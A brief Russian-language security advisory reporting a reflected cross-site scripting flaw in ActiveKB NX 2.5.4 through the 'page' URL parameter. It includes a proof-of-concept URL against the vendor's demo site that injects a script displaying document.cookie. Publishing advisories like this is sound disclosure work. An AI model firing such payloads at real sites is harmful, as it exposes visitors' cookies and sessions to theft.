Программа: ActiveKB NX 2.5.4

Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы.

Пример:

http://www.target.com/activekb/ActiveKB/?page=[XXS]

http://www.interspire.com/activekb/demo/default/categories/ActiveKB/ ?page=%3Cscript%3Ealert(document.cookie);%3C/script%3E



Оставить мнение